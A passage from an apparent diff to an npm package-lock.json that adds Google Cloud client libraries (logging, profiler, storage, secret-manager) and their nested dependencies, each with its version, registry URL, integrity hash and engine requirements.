"sha512-FNTkdNEnBdlqF2oatizolQqNANMrcqJt6AAYt99B3y1aLLC8Hc5IOBb+ZnnzllodEEf6xMBp6wRcBbc16fa65w==", + "dependencies": { + "gaxios": "^5.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-gax": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-3.6.1.tgz", + "integrity": "sha512-g/lcUjGcB6DSw2HxgEmCDOrI/CByOwqRvsuUvNalHUK2iPPPlmAIpbMbl62u0YufGMr8zgE3JL7th6dCb1Ry+w==", + "dependencies": { + "@grpc/grpc-js": "~1.8.0", + "@grpc/proto-loader": "^0.7.0", + "@types/long": "^4.0.0", + "@types/rimraf": "^3.0.2", + "abort-controller": "^3.0.0", + "duplexify": "^4.0.0", + "fast-text-encoding": "^1.0.3", + "google-auth-library": "^8.0.2", + "is-stream-ended": "^0.1.4", + "node-fetch": "^2.6.1", + "object-hash": "^3.0.0", + "proto3-json-serializer": "^1.0.0", + "protobufjs": "7.2.4", + "protobufjs-cli": "1.1.1", + "retry-request": "^5.0.0" + }, + "bin": { + "compileProtos": "build/tools/compileProtos.js", + "minifyProtoJson": "build/tools/minify.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/teeny-request": { + "version": "8.0.3", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.3.tgz", + "integrity": "sha512-jJZpA5He2y52yUhA7pyAGZlgQpcB+xLjcN0eUFxr9c8hP/H7uOXbBNVo/O0C/xVfJLJs680jvkFgVJEEvk9+ww==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/logging-min/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/common": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-5.0.2.tgz", + "integrity": "sha512-V7bmBKYQyu0eVG2BFejuUjlBt+zrya6vtsKdY+JxMM/dNntPF41vZ9+LhOshEUH01zOHEqBSvI7Dad7ZS6aUeA==", + "dependencies": { + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "extend": "^3.0.2", + "google-auth-library": "^9.0.0", + "html-entities": "^2.5.2", + "retry-request": "^7.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/paginator": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz", + "integrity": "sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/projectify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", + "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/@google-cloud/promisify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", + "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/agent-base": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.1.tgz", + "integrity": "sha512-H0TSyFNDMomMNJQBn8wFV5YC/2eJ+VXECwOadZJT554xP6cODZHPX3H9QMQECxvrgiSOP1pHjy1sMWQVYJOUOA==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging/node_modules/debug": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.5.tgz", + "integrity": "sha512-pt0bNEmneDIvdL1Xsd9oDQ/wrQRkXDT4AUWlNZNPKvW5x/jyO9VFXkJUP07vQ2upmw5PlaITaPKc31jK13V+jg==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/logging/node_modules/duplexify": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz", + "integrity": "sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.2" + } + }, + "node_modules/@google-cloud/logging/node_modules/gaxios": { + "version": "6.6.0", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.6.0.tgz", + "integrity": "sha512-bpOZVQV5gthH/jVCSuYuokRo2bTKOcuBiVWpjmTn6C5Agl5zclGfTljuGsQZxwwDBkli+YhZhP4TdlqTnhOezQ==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gaxios/node_modules/https-proxy-agent": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.4.tgz", + "integrity": "sha512-wlwpilI7YdjSkWaQ/7omYBMTliDcmCN8OLihO6I9B86g06lMyAoqgoDpV0XqoaPOKj+0DIdAvnsWfyAAhmimcg==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gcp-metadata": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.0.tgz", + "integrity": "sha512-Jh/AIwwgaxan+7ZUUmRLCjtchyDiqh4KjBJ5tW3plBZb5iL/BPcso8A5DlzeD9qlw0duCamnNdpFjxwaT0KyKg==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/google-auth-library": { + "version": "9.10.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.10.0.tgz", + "integrity": "sha512-ol+oSa5NbcGdDqA+gZ3G3mev59OHBZksBTxY/tYwjtcp1H/scAFwJfSQU9/1RALoyZ7FslNbke8j4i3ipwlyuQ==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.1.1", + "gcp-metadata": "^6.1.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/gtoken": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", + "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/logging/node_modules/retry-request": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", + "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "dependencies": { + "@types/request": "^2.48.8", + "extend": "^3.0.2", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/logging/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/opentelemetry-cloud-trace-exporter": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/opentelemetry-cloud-trace-exporter/-/opentelemetry-cloud-trace-exporter-2.1.0.tgz", + "integrity": "sha512-6IPFnWG4edDgNfgLxXJjTjNYGAW8ZQ7Oz7eGZJMgQsIiEALNIAk4e/MgccglL3yh5ReONY3YePcGRWQKPbxmUg==", + "dependencies": { + "@google-cloud/opentelemetry-resource-util": "^2.1.0", + "@grpc/grpc-js": "^1.1.8", + "@grpc/proto-loader": "^0.7.0", + "google-auth-library": "^7.0.0", + "google-proto-files": "^3.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.0.0", + "@opentelemetry/core": "^1.0.0", + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/sdk-trace-base": "^1.0.0" + } + }, + "node_modules/@google-cloud/opentelemetry-resource-util": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/opentelemetry-resource-util/-/opentelemetry-resource-util-2.1.0.tgz", + "integrity": "sha512-/Qqnm6f10e89Txt39qpIhD+LCOF80artYOVwNF1ZAzgJFxBldEniNkf19SR+q9LAp75ZZWKyhRlumM1V7fT8gw==", + "dependencies": { + "gcp-metadata": "^5.0.1" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/resources": "^1.0.0", + "@opentelemetry/semantic-conventions": "^1.0.0" + } + }, + "node_modules/@google-cloud/paginator": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@google-cloud/paginator/-/paginator-3.0.7.tgz", + "integrity": "sha512-jJNutk0arIQhmpUUQJPJErsojqo834KcyB6X7a1mxuic8i1tKXxde8E69IZxNZawRIlZdIK2QY4WALvlK5MzYQ==", + "dependencies": { + "arrify": "^2.0.0", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/profiler/-/profiler-6.0.0.tgz", + "integrity": "sha512-EAxPbDiNRidAKOEnlUK3M+CcOlqG+REkUEZKirLtxFwzI/m7LmGqDzQvrVWTOSFSEYJ9qQRRnO+Q1osNGk3NUg==", + "dependencies": { + "@google-cloud/common": "^5.0.0", + "@google-cloud/logging-min": "^10.0.0", + "@types/console-log-level": "^1.4.0", + "@types/semver": "^7.0.0", + "console-log-level": "^1.4.0", + "delay": "^5.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^6.0.0", + "parse-duration": "^1.0.0", + "pprof": "3.2.1", + "pretty-ms": "^7.0.0", + "protobufjs": "~7.2.4", + "semver": "^7.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/common": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-5.0.0.tgz", + "integrity": "sha512-IsbTVr7Ag+04GMT87X738vDs85QU1rMvaesm2wEQrtTbZAR92tGmUQ8/D/kdnYgAi98Q4zmfhF+T8Xs/Lw4zAA==", + "dependencies": { + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^9.0.0", + "retry-request": "^6.0.0", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/projectify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz", + "integrity": "sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/@google-cloud/promisify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz", + "integrity": "sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==", + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/agent-base": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.0.tgz", + "integrity": "sha512-o/zjMZRhJxny7OyEF+Op8X+efiELC7k7yOjMzgfzVqOzXqkBkWI79YoTdOtsuWd5BWhAGAuOY/Xa6xpiaWXiNg==", + "dependencies": { + "debug": "^4.3.4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@google-cloud/profiler/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gaxios": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.1.1.tgz", + "integrity": "sha512-bw8smrX+XlAoo9o1JAksBwX+hi/RG15J+NTSxmNPIclKC3ZVK6C2afwY8OSdRvOK0+ZLecUJYtj2MmjOt3Dm0w==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gaxios/node_modules/https-proxy-agent": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.2.tgz", + "integrity": "sha512-NmLNjm6ucYwtcUmL7JQC1ZQ57LmHP4lT15FQ8D61nak1rO6DH+fz5qNK2Ap5UN4ZapYICE3/0KodcLYSPsPbaA==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gcp-metadata": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.0.0.tgz", + "integrity": "sha512-Ozxyi23/1Ar51wjUT2RDklK+3HxqDr8TLBNK8rBBFQ7T85iIGnXnVusauj06QyqCXRFZig8LZC+TUddWbndlpQ==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/google-auth-library": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.1.0.tgz", + "integrity": "sha512-1M9HdOcQNPV5BwSXqwwT238MTKodJFBxZ/V2JP397ieOLv4FjQdfYb9SooR7Mb+oUT2IJ92mLJQf804dyx0MJA==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.0.0", + "gcp-metadata": "^6.0.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/gtoken": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.0.1.tgz", + "integrity": "sha512-KcFVtoP1CVFtQu0aSk3AyAt2og66PFhZAlkUOuWKwzMLoulHXG5W5wE5xAnHb+yl3/wEFoqGW7/cDGMU8igDZQ==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/profiler/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@google-cloud/profiler/node_modules/retry-request": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-6.0.0.tgz", + "integrity": "sha512-24kaFMd3wCnT3n4uPnsQh90ZSV8OISpfTFXJ00Wi+/oD2OPrp63EQ8hznk6rhxdlpwx2QBhQSDz2Fg46ki852g==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/profiler/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@google-cloud/profiler/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/profiler/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@google-cloud/projectify": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-2.1.1.tgz", + "integrity": "sha512-+rssMZHnlh0twl122gXY4/aCrk0G1acBqkHFfYddtsqpYXGxA29nj9V5V9SfC+GyOG00l650f6lG9KL+EpFEWQ==", + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/promisify": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-2.0.4.tgz", + "integrity": "sha512-j8yRSSqswWi1QqUGKVEKOG03Q7qOoZP6/h2zN2YO+F5h2+DHU0bSrHCK9Y7lo2DI9fBd8qGAw795sf+3Jva4yA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/secret-manager": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/@google-cloud/secret-manager/-/secret-manager-5.6.0.tgz", + "integrity": "sha512-0daW/OXQEVc6VQKPyJTQNyD+563I/TYQ7GCQJx4dq3lB666R9FUPvqHx9b/o/qQtZ5pfuoCbGZl3krpxgTSW8Q==", + "dependencies": { + "google-gax": "^4.0.3" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/storage": { + "version": "6.10.1", + "resolved": "https://registry.npmjs.org/@google-cloud/storage/-/storage-6.10.1.tgz", + "integrity": "sha512-EtLlT0YbXtrbUxaNbEfTyTytrjELtl4i42flf8COg+Hu5+apdNjsFO9XEY39wshxAuVjLf4fCSm7GTSW+BD3gQ==", + "dependencies": { + "@google-cloud/paginator": "^3.0.7", + "@google-cloud/projectify": "^3.0.0", + "@google-cloud/promisify": "^3.0.0", + "abort-controller": "^3.0.0", + "async-retry": "^1.3.3", + "compressible": "^2.0.12", + "duplexify": "^4.0.0", + "ent": "^2.2.0", + "extend": "^3.0.2", + "gaxios": "^5.0.0", + "google-auth-library": "^8.0.1", + "mime": "^3.0.0", + "mime-types": "^2.0.8", + "p-limit": "^3.0.1", + "retry-request": "^5.0.0", + "teeny-request": "^8.0.0", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/@google-cloud/projectify": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@google-cloud/projectify/-/projectify-3.0.0.tgz", + "integrity": "sha512-HRkZsNmjScY6Li8/kb70wjGlDDyLkVk3KvoEo9uIoxSjYLJasGiCch9+PqRVDOCGUFvEIqyogl+BeqILL4OJHA==", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/@google-cloud/promisify": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@google-cloud/promisify/-/promisify-3.0.1.tgz", + "integrity": "sha512-z1CjRjtQyBOYL+5Qr9DdYIfrdLBe746jRTYfaYU6MeXkqp7UfYs/jX16lFFVzZ7PGEJvqZNqYUEtb1mvDww4pA==", + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/google-auth-library": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.7.0.tgz", + "integrity": "sha512-1M0NG5VDIvJZEnstHbRdckLZESoJwguinwN8Dhae0j2ZKIQFIV63zxm6Fo6nM4xkgqUr2bbMtV5Dgo+Hy6oo0Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.0.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@google-cloud/storage/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@google-cloud/storage/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": 